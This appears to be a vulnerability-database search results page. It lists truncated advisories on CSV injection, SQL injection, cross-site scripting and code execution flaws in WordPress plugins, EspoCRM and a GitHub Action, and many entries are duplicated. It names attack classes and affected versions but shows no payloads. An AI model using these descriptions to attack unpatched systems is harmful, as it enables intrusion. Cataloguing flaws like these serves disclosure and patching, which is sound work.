5078 matches found
PT-2022-24180 · WordPress · Export Post Info
Name of the Vulnerable Software and Affected Versions: Export Post Info plugin versions 1.2.0 and earlier Description: The issue is related to an Authenticated CSV Injection vulnerability. This vulnerability affects the Export Post Info plugin at WordPress, where an authenticated user with author...
WordPress plugin Export Post Info 安全漏洞
WordPress and WordPress plugin are both products of the WordPress Foundation.WordPress is a blogging platform developed using the PHP language. WordPress is a blogging platform developed in the PHP language that supports personal blogs on PHP and MySQL servers.WordPress plugin is an application...
WordPress Export Post Info plugin <= 1.2.0 - Authenticated CSV Injection vulnerability
Authenticated CSV Injection vulnerability discovered by Mika Patchstack Alliance in WordPress Export Post Info plugin versions = 1.2.0. Solution Update the WordPress Export Post Info plugin to the latest available version at least 1.2.1...
CVE-2022-36386
Authenticated Arbitrary Code Execution vulnerability in Soflyy Import any XML or CSV File to WordPress plugin = 3.6.7 at WordPress...
Remote code execution
Authenticated Arbitrary Code Execution vulnerability in Soflyy Import any XML or CSV File to WordPress plugin = 3.6.7 at WordPress...
CVE-2022-36386 WordPress Import any XML or CSV File to WordPress plugin <= 3.6.7 - Authenticated Arbitrary Code Execution vulnerability
Authenticated Arbitrary Code Execution vulnerability in Soflyy Import any XML or CSV File to WordPress plugin = 3.6.7 at WordPress...
Import all XML, CSV & TXT into WordPress < 6.5.8 - Admin+ SQLi
The plugin does not properly sanitise and escape imported data before using them back SQL statements, leading to SQL injection exploitable by high privilege users such as admin With the additional https://wordpress.org/plugins/polylang/ plugin installed, import a CSV with the following payload in...
Import all XML, CSV & TXT into WordPress < 6.5.8 - Admin+ SQLi
The plugin does not properly sanitise and escape imported data before using them back SQL statements, leading to SQL injection exploitable by high privilege users such as admin PoC With the additional https://wordpress.org/plugins/polylang/ plugin installed, import a CSV with the following payloa...
CVE-2022-39217
some-natalie/ghas-to-csv GitHub Advanced Security to CSV is a GitHub action which scrapes the GitHub Advanced Security API and shoves it into a CSV. In affected versions this GitHub Action creates a CSV file without sanitizing the output of the APIs. If an alert is dismissed or any other custom...
Code injection
some-natalie/ghas-to-csv GitHub Advanced Security to CSV is a GitHub action which scrapes the GitHub Advanced Security API and shoves it into a CSV. In affected versions this GitHub Action creates a CSV file without sanitizing the output of the APIs. If an alert is dismissed or any other custom...
CVE-2022-39217 Improper Neutralization of Formula Elements in a CSV File in ghas-to-csv
some-natalie/ghas-to-csv GitHub Advanced Security to CSV is a GitHub action which scrapes the GitHub Advanced Security API and shoves it into a CSV. In affected versions this GitHub Action creates a CSV file without sanitizing the output of the APIs. If an alert is dismissed or any other custom...
CVE-2022-39217
CVE-2022-39217 affects the GitHub Action some-natalie/ghas-to-csv (GitHub Advanced Security to CSV). The action creates a CSV from the GitHub Advanced Security API without sanitizing API output, enabling potential execution of arbitrary code if a dismissible alert or custom field contains executa...
CVE-2022-39217 Improper Neutralization of Formula Elements in a CSV File in ghas-to-csv
some-natalie/ghas-to-csv GitHub Advanced Security to CSV is a GitHub action which scrapes the GitHub Advanced Security API and shoves it into a CSV. In affected versions this GitHub Action creates a CSV file without sanitizing the output of the APIs. If an alert is dismissed or any other custom...
CVE-2022-39217 Improper Neutralization of Formula Elements in a CSV File in ghas-to-csv
some-natalie/ghas-to-csv GitHub Advanced Security to CSV is a GitHub action which scrapes the GitHub Advanced Security API and shoves it into a CSV. In affected versions this GitHub Action creates a CSV file without sanitizing the output of the APIs. If an alert is dismissed or any other custom...
ghas-to-csv vulnerable to Improper Neutralization of Formula Elements in a CSV File
Impact This GitHub Action creates a CSV file without sanitizing the output of the APIs. If an alert is dismissed or any other custom field contains executable code / formulas, it might be run when an endpoint opens that CSV file in a spreadsheet program. The data flow looks like this 👇🏻 mermaid...
GHSA-634P-93H9-92VH ghas-to-csv vulnerable to Improper Neutralization of Formula Elements in a CSV File
Impact This GitHub Action creates a CSV file without sanitizing the output of the APIs. If an alert is dismissed or any other custom field contains executable code / formulas, it might be run when an endpoint opens that CSV file in a spreadsheet program. The data flow looks like this 👇🏻 mermaid...
CVE-2022-38844
CSV Injection in Create Contacts in EspoCRM 7.1.8 allows remote authenticated users to run system commands via creating contacts with payloads capable of executing system commands. Admin user exporting contacts in CSV file may end up executing the malicious system commands on his system...
CVE-2022-38845
Cross Site Scripting in Import feature in EspoCRM 7.1.8 allows remote users to run malicious JavaScript in victim s browser via sending crafted csv file containing malicious JavaScript to authenticated user. Any authenticated user importing the crafted CSV file may end up running the malicious...
CVE-2022-38845
Cross Site Scripting in Import feature in EspoCRM 7.1.8 allows remote users to run malicious JavaScript in victim s browser via sending crafted csv file containing malicious JavaScript to authenticated user. Any authenticated user importing the crafted CSV file may end up running the malicious...
CVE-2022-38844
CSV Injection in Create Contacts in EspoCRM 7.1.8 allows remote authenticated users to run system commands via creating contacts with payloads capable of executing system commands. Admin user exporting contacts in CSV file may end up executing the malicious system commands on his system...